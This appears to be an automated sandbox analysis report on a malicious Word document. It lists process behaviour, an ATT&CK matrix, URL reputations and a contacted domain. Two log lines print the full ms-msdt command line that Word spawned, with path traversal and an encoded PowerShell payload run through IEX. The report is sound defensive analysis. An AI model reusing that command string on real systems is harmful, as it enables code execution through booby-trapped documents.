        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1187Jump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1129Jump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe Jump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        Process Injection        		11
        Masquerading        		OS Credential Dumping1
        Query Registry        		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts23
        Exploitation for Client Execution        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Process Injection        		LSASS Memory1
        Application Window Discovery        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        Obfuscated Files or Information        		Security Account Manager1
        Remote System Discovery        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        DLL Side-Loading        		NTDS2
        File and Directory Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer13
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets12
        System Information Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://roaming.edog.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://api.aadrm.com0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe
        https://cyberleague.co/th1s.html0%Avira URL Cloudsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        cyberleague.co
        		13.250.15.191
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://cyberleague.co/th1s.htmltrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.diagnosticssdf.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
            		high
            https://login.microsoftonline.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
              		high
              https://shell.suite.office.com:14434EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                		high
                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                  		high
                  https://autodiscover-s.outlook.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                    		high
                    https://roaming.edog.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                      		high
                      https://cdn.entity.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.addins.omex.office.net/appinfo/query4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                        		high
                        https://clients.config.office.net/user/v1.0/tenantassociationkey4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                          		high
                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                            		high
                            https://powerlift.acompli.net4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://rpsticket.partnerservices.getmicrosoftkey.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://lookup.onenote.com/lookup/geolocation/v14EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                              		high
                              https://cortana.ai4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                		high
                                https://cloudfiles.onenote.com/upload.aspx4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                  		high
                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                    		high
                                    https://entitlement.diagnosticssdf.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                      		high
                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                        		high
                                        https://api.aadrm.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://ofcrecsvcapi-int.azurewebsites.net/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                          		high
                                          https://api.microsoftstream.com/api/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                            		high
                                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                              		high
                                              https://cr.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                		high
                                                https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                https://portal.office.com/account/?ref=ClientMeControl4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                  		high
                                                  https://graph.ppe.windows.net4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                    		high
                                                    https://res.getmicrosoftkey.com/api/redemptionevents4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://powerlift-frontdesk.acompli.net4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://tasks.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                      		high
                                                      https://officeci.azurewebsites.net/api/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://sr.outlook.office.net/ws/speech/recognize/assistant/work4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                        		high
                                                        https://store.office.cn/addinstemplate4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.aadrm.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://outlook.office.com/autosuggest/api/v1/init?cvid=4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                          		high
                                                          https://globaldisco.crm.dynamics.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                            		high
                                                            https://messaging.engagement.office.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                              		high
                                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                		high
                                                                https://dev0-api.acompli.net/autodetect4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.odwebp.svc.ms4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://api.diagnosticssdf.office.com/v2/feedback4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                  		high
                                                                  https://api.powerbi.com/v1.0/myorg/groups4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                    		high
                                                                    https://web.microsoftstream.com/video/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                      		high
                                                                      https://api.addins.store.officeppe.com/addinstemplate4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://graph.windows.net4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                        		high
                                                                        https://dataservice.o365filtering.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://officesetup.getmicrosoftkey.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://analysis.windows.net/powerbi/api4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                          		high
                                                                          https://prod-global-autodetect.acompli.net/autodetect4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://outlook.office365.com/autodiscover/autodiscover.json4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                            		high
                                                                            https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                              		high
                                                                              https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                		high
                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                  		high
                                                                                  https://ncus.contentsync.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                    		high
                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                      		high
                                                                                      http://weather.service.msn.com/data.aspx4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                        		high
                                                                                        https://apis.live.net/v5.0/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                          		high
                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                            		high
                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                              		high
                                                                                              https://management.azure.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                		high
                                                                                                https://outlook.office365.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                  		high
                                                                                                  https://wus2.contentsync.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://incidents.diagnostics.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                    		high
                                                                                                    https://clients.config.office.net/user/v1.0/ios4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                      		high
                                                                                                      https://insertmedia.bing.office.net/odc/insertmedia4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                        		high
                                                                                                        https://o365auditrealtimeingestion.manage.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office365.com/api/v1.0/me/Activities4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                            		high
                                                                                                            https://api.office.net4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                              		high
                                                                                                              https://incidents.diagnosticssdf.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                		high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
